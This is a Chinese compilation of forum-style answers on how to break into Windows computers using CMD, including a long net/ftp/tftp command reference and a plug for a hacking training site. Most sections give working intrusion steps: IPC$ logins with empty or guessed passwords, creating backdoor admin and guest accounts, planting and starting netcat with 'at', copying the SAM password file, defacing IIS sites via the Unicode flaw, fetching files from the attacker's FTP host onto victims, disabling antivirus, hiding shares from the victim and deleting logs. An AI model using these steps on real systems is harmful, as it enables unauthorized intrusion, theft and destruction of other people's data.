文章大纲：

• 1、怎样用CMD攻击！拜托各位了 3Q
• 2、如何用cmd入侵
• 3、如何入侵局域网电脑
• 4、怎样利用“CMD”进行黑客入侵？
• 5、电脑入侵需要哪些步骤？?

怎样用CMD攻击！拜托各位了 3Q

CMD—入侵的常用命令 一般入侵所需要的几个常用命令 1：NET 只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ 这里我们假如你得到的用户是XC，密码是123456。假设对方IP为127.0.0.1 net use \\\\127.0.0.1\\ipc$ "123456" /user:"XC" 退出的命令是 net use \\\\127.0.0.1\\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的 *** 就在上面. ---------------------- 下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户. 我们加一个XC的用户密码为123456 net user XC 123456 /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net 123456 Administrators XC /add ---------------------- 这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. net use z:\\\\127.0.0.1\\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。 net user guest /active:yes ---------------------- 这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！ net user guest lovechina 2:at 一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？ 那么需要用AT命令，这里假设你已经登陆了那个服务器。 你首先要得到对方的时间， net time \\\\127.0.0.1 将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1 at \\\\127.0.0.1 12:3 nc.exe 这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上. 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 3:telnet 这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 4:FTP 它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个[url] [/url], 不错的.当我们申请完后，它会给用户名,密码,以及FTP服务器. 在上传前需要登陆先，这里我们假设FTP服务器是[url] [/url], 用户名是HUC *** ,密码是654321 ftp [url] [/url] 他会要求输入用户,成功后会要求输入密码. ---------------------- 下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\\下,传到对方D:\\ get c:\\index.htm d:\\ 假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 put c:\\index.htm d:\\ 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 copy index.htm \\\\127.0.0.1\\c$\\index.htm ---------------------- 如果你要复制到D盘下把C改为D，就行了！ copy index.htm \\\\127.0.0.1\\d$\\index.htm ---------------------- 如果你要把他复制到WINNT目录里 就要把输入 copy index.htm \\\\127.0.0.1\\admin$\\index.htm admin$是winnt ---------------------- 要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\\winnt\\repair\\sam._ sam._是数据库的文件名 下面就把127.0.0.1的数据库复制到本地C盘下 copy \\\\127.0.0.1\\admin$\\repair\\sam._ c:\\ ---------------------- 6：set 如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！ 下面是我得到的结果！我来分析它，只是找主页在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:\\WINNT\\system32\\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\\WINNT\\system32\\os2\\dll; OS=Windows_NT Path=D:\\WINNT\\system32;D:\\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\\WINNT TZ=GMT-9 USERPROFILE=D:\\WINNT\\Profiles\\Default User windir=D:\\WINNT 粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个 *** 才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。 7：nbtstat 如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！ 现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大写哦。 下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII 00 UNIQUE PENTIUMII 20 UNIQUE ORAHOTOWN 00 GROUP ORAHOTOWN 1C GROUP ORAHOTOWN 1B UNIQUE PENTIUMII 03 UNIQUE INet~Services 1C GROUP IS~PENTIUMII...00 UNIQUE ORAHOTOWN 1E GROUP ORAHOTOWN 1D UNIQUE ..__MSBROWSE__.01 GROUP 粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是03的话，那他前面的就是用户。 这里的用户是PENTIUMII。 8：Shutdown 关了对方的NT服务器的命令 Shutdown \\\\IP地址 t:20 20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。 9：DIR 这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。 你可以本地试下。 10：echo 著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。 我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种 *** ，大家看看有什么区别。 echo 南京大屠杀铁证如山，任何日本人不得抵赖！index.htm echo 南京大屠杀铁证如山，任何日本人不得抵赖！index.htm 之一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。 第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。 “”产生的内容将追加进文件中，“”则将原文件内容覆盖。 大家可以本地试下。 可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。 1、首先，我们需要申请一个免费的主页空间。 2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。） open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的） cnhack（你申请时的用户名） test（你申请时的密码） get index.htm c:\\inetpub\\wwwroot\\index.htm（这里是把你空间上的index.htm下载到对方的c:\\inetpub\\wwwroot\\index.htm） bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS） 具体的做法： 输入echo open upload.chinaren.com c:\\cnhack.txt 输入echo cnhack c:\\cnhack.txt 输入echo 39abs c:\\cnhack.txt 输入echo get index.htm c:\\inetpub\\wwwroot\\index.htm++c:\\cnhack.txt 最后输入 ftp -s:c:\\cnhack.txt （利用ftp的-s参数，执行文件里的内容。） 等命令完成时，文件已经下载到你指定的文件里了。 注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。） 记得要 del c:\\cnhack.txt 11:attrib 这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。 attrib -r index.htm 这个命令是把index.htm的只读属性去掉。 如果把“-”改为“+”则是把这个文件的属性设置为只读 ---------------------- attrib +r index.htm 这个命令是把index.htm的属性设置为只读。 12:del 当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 NT的日志有这些 del C:\\winnt\\system32\\logfiles\\*.* del C:\\winnt\\ssytem32\\config\\*.evt del C:\\winnt\\system32\\dtclog\\*.* del C:\\winnt\\system32\\*.log del C:\\winnt\\system32\\*.txt del C:\\winnt\\*.txt del C:\\winnt\\*.log 只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘

采纳哦

如何用cmd入侵

以下叙述内容全部是本人亲身体会的经验,如果对您有用,请给我加点分,谢谢

我和百度Hi上几个朋友还有寝室里的同学坚持每天都去黒客动画吧学习

这个网站的技术教程相当全面,工具非常多,更新速度很快

这个站有8年的悠久历史了

(他们还携手网易推出了大型的免费培训课程,你可以去论坛首页就可以看到地址了

只有信誉非常好的站才有资格与IT业龙头公司合作的)

在里面可以学到安全防范技术,网站入侵检测技术,软件编程,软件破解,软件免杀修改,黑客攻击与防御等等诸多黑客攻防安全技术

论坛的热心高手也很多,让你真正零距离接触黑客

(他们论坛里面有免费的培训班也有收费VIP的培训课程)

我师傅就是每天看他们主站更新的免费黑客动画学成入侵安全检测高手的

我今年也刚加入了他们的VIP,正在接受他们的老师正式的黑客攻防培训,由浅到深的逐步学习,我本人也比较笨比较菜,但是有老师在线指点,学习时有问必答,学起来也觉得不是那么吃力

我个人感觉有这个站学习就足够了,既安全又实在 !

善意的提醒:不要乱选择黑客网站,现在骗子站很多,一不小心可能还会中毒,也不要去拜师,个人名义收徒弟的99%都是骗子,谨防上当受骗!

如何入侵局域网电脑

首先申明：

1.入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网;

2.能入侵的只是存在弱口令(用户名为administrator等,密码为空)，并且开了139端口，但没开防火墙的机子。

入侵工具：

一般要用到三个：NTscan变态扫描器，Recton--D贺免杀专用版，DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。)

入侵步骤：

1.使用"NTscan变态扫描器"，在IP处填上要扫描的IP范围，选择"WMI扫描"方式，按"开始"后就等扫描结果了。

2.使用"Recton--D贺免杀专用版"

选择"CMD命令"项，在"CMD:"中输入"net share C$=C:\"，即可开启远程主机的C盘共享，以此将"C"换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入"\\对方IP\C$"，即可进入对方C盘。

选择"Telnet"项，在"远程主机"中输入刚才扫描到的一个IP，远程启动Telnet服务，成功后在"CMD选项"中，执行命令："net share ipc$",接着执行："net share admin$",最后执行"net use \\***.***.***.***\IPC$ "" /user：administrator"在*处填入你入侵的主机IP。

3.使用"DameWare迷你中文版 4.5"，安装后点"DameWare Mini Remote Control"，在"帮助"项中选择激活产品，输入注册信息，成功注册后，进入"远程连接"窗口，在"主机"处填入IP地址，点"设置"，在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选，在"用户选项"中去掉"启用用户选项菜单"。设置完成好后，就可点"连接"，在弹出的对话框中点"确定"后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。 注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

入侵步骤补充：

1.在以上第2步中，远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。

2.Recton--D贺免杀专用版还有其他功能，在"进程"项中，可以查看远程主机的进程，并可任意结束其中进程;在"共享"项中，可以创建共享，我常用是创建C$,D$,E$,F$,共享路径分别对应C：\,D：\等，共享好后在地址栏中输入"\\IP\C$",进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后更好还是把共享给关掉。最后选"日志"，清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后，开共享用net share命令，共享C$(即C盘)："net share C$=C：",共享system文件夹："net share c=c：\winnt\system32",共享IPC$用："net share IPC$"等,最后是关闭共享，关闭C盘共享："net share C$ /del"。

4.为方便下次入侵，可以设置后门， 查看用户："net user",激活guest用户

"net user guest /active：yes",更改guest的密码为poco："net user guest poco",把guest的`权限提升为管理员权限："net localgroup administrators guest /add"。

5.telnet命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：""dir d：\",查看C盘program file文件夹："dir c：\PROGRA~1\;",60秒倒记时关机："shutdown -s -t 60"

补充说明：

1.net use错误原因解决：

(1)."发生系统错误 1326。 登录失败： 未知的用户名或错误密码。"

在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把 *** 连接权限都归为 guest连接，是无法访问C$等管理共享的.

(2)"发生系统错误 1327。 登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里，禁用"空密码用户只能进行控制台登陆".

(3)"//IP/c$"时提示找不到 *** 途径。在" *** 和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性，进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".

怎样利用“CMD”进行黑客入侵？

net use ipipc$ " " /user:" " 建立IPC空链接

net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: ipc$ 登陆后映射对方C：到本地为H:

net use ipipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名　密码　/add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名　 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time 目标ip 查看对方时间

net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符路径要移动的文件名　存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径文件名1　路径文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树　目标地址目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后，将“IP”的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP　put c:server.exe 登陆后，上传本地c:server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示 *** 地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并更大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为：EntSky )

三：

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：format D: /FS:NTFS

md　目录名 创建目录

replace 源文件　要替换文件的目录 替换文件

ren 原文件名　新文件名 重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地 *** 配置情况

四：

IIS服务命令：

iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）

iisreset /start或stop 启动（停止）所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。

FTP 命令： (后面有详细说明内容)

ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

－d 使用调试方式。

－n 限制ftp的自动登录,即不使用.netrc文件。

－g 取消全局文件名。

help [命令] 或 ？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote－dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

更佳吧

电脑入侵需要哪些步骤？?

在这里告诉大家如何入侵别人电脑，从而演绎我们那在别人电脑上无所不能的神话…

首先要确定要入侵电脑的IP，关于IP，网吧的编号和IP地址通常是相同或高一位，比如编号为

20的电脑，IP一般是192.168.0.20或192.168.0.21… 大家要是上贴吧匿名发帖子的话，也会

看见IP地址…

有了IP地址后，就可以连接那将被你入侵的倒霉电脑了，一般登陆电脑的用户名多是“user编号”

的形式空密码形式，所以在“命令提示符”下输入net use //IP地址/ipc$""/user:""及

net use //IP地址/ipc$""/user:"user编号"命令进行连接

连接成功后必须关闭对方电脑的杀毒软件，右击“我的电脑”，选择“管理”在弹出窗口中右击

“计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动

“Tenlet”服务

然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。

net user user编号/add

net localgroup administators user编号/add

然后进入C:\Winnt\System32,右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择

“属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以其他用户身份运行”窗

口后，输入“user编号”回车

用telnet 电脑IP编号 登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件，

比如说knlps等，在telnet上将杀毒软件进程关闭

这样就OK了

做你想做的事吧……，呵呵…，有兴趣的…试试

黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的更高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。 现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵 *** :

1.取得对方IP地址如XX.XX.XX.XX， *** 太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 N *** STAT -A XX.XX.XX.XX 之一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明

4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名

5.开DOS窗口键入 N *** STAT -R

6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上 *** 请不要乱用，本人对你用上面的 *** 所惹出的麻烦概不负责，请慎重。 对付上面进攻的更好办法就是隐藏你的IP地址。